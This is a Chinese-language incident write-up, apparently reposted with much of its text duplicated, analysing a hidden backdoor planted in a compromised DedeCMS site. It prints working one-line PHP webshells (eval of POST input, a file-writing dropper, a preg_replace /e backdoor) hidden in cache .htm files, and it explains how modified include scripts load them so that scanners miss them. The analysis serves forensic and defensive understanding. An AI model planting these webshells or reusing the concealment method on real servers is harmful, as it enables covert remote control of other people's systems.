一種奇特的DEDE隱藏後門辦法

• 2013/06/28作者: admin

一種奇特的DEDE隱藏後門辦法

單位某站用的dedecms,今天被某黑闊getshell了，提交到了wooyun.

爲了還原黑闊入侵的手法，用鬼哥的getshell測試居然沒成功, 是不是getshell過一次，再次就不會成功呢？

無奈只能打包代碼，用各種webshell掃描器只掃到一個data/tplcache/xxxxx.inc文件，文件代碼如下：

Default

 

轉自:http://www.91ri.org/6462.html

 

一種奇特的DEDE隱藏後門辦法

單位某站用的dedecms,今天被某黑闊getshell了，提交到了wooyun.

爲了還原黑闊入侵的手法，用鬼哥的getshell測試居然沒成功, 是不是getshell過一次，再次就不會成功呢？

無奈只能打包代碼，用各種webshell掃描器只掃到一個data/tplcache/xxxxx.inc文件，文件代碼如下：

 

 

 

 

 

 

Default

 

1	{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}

 

但是翻遍所有的Web目錄也沒有找到90sec.php文件，有朋友指點說可能是其它文件include這個文件。然後又用Seay的代碼審計工具定義關鍵字各種掃，還是沒找到。

最後老大翻到data/cache目錄下發現了幾個htm文件，myad-1.htm,myad-16.htm,mytag-1208.htm等，打開這些html文件，代碼分別如下：

 

 

 

 

 

Default

 

1 2 3 4

<!–   document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”); –>

 

 

 

 

 

 

 

 

 

Default

 

1 2 3 4 5

<!–   document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);   –>

 

 

 

 

 

 

 

 

 

Default

 

1 2 3

<!– document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”); –>

 

看到這幾個文件很奇怪，不知道黑闊要幹嘛？？雖然代碼看似很熟悉，但是HTML文件能當後門用麼？想起之前朋友說的include,然後結合前段時 間的getshell漏洞利用細節，最終翻到plus/mytag_js.php文件，在這個文件裏終於發現黑闊無節操的地方，主要代碼如下：

看到上面的代碼我們應該知道黑闊是多麼的邪惡，在生成的htm格式的cache文件中寫入各種類型的一句話代碼，然後再修改 plus/ad_js.php和mytag_js.php文件，包含htm格式的cache文件。這樣黑闊只需要在菜刀中填入以下URL就可以連接一句話 了.

http://www.91ri.org /plus/mytag_js.php?id=1208

http://www.91ri.org /plus/ad_js.php?id=1

具體的id以及文件名跟data/cache目錄下的myad-1.htm，mytag-1208.htm是有關係的。因此各種webshell掃描器都沒有掃到webshell後門文件，因爲很多默認都不對htm進行掃描.

不怎麼懂php，所以分析可能有差錯的地方，歡迎指正

 

但是翻遍所有的Web目錄也沒有找到90sec.php文件，有朋友指點說可能是其它文件include這個文件。然後又用Seay的代碼審計工具定義關鍵字各種掃，還是沒找到。

最後老大翻到data/cache目錄下發現了幾個htm文件，myad-1.htm,myad-16.htm,mytag-1208.htm等，打開這些html文件，代碼分別如下：

Default

1 2 3 4

<!–   document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”); –>

Default

1 2 3 4 5

<!–   document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);   –>

 

Default

 

1 2 3

<!– document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”); –>

 

看到這幾個文件很奇怪，不知道黑闊要幹嘛？？雖然代碼看似很熟悉，但是HTML文件能當後門用麼？想起之前朋友說的include,然後結合前段時 間的getshell漏洞利用細節，最終翻到plus/mytag_js.php文件，在這個文件裏終於發現黑闊無節操的地方，主要代碼如下：

看到上面的代碼我們應該知道黑闊是多麼的邪惡，在生成的htm格式的cache文件中寫入各種類型的一句話代碼，然後再修改 plus/ad_js.php和mytag_js.php文件，包含htm格式的cache文件。這樣黑闊只需要在菜刀中填入以下URL就可以連接一句話 了.

http://www.91ri.org /plus/mytag_js.php?id=1208

http://www.91ri.org /plus/ad_js.php?id=1

具體的id以及文件名跟data/cache目錄下的myad-1.htm，mytag-1208.htm是有關係的。因此各種webshell掃描器都沒有掃到webshell後門文件，因爲很多默認都不對htm進行掃描.

不怎麼懂php，所以分析可能有差錯的地方，歡迎指正！

link:http://www.nxadmin.com/penetration/1168.html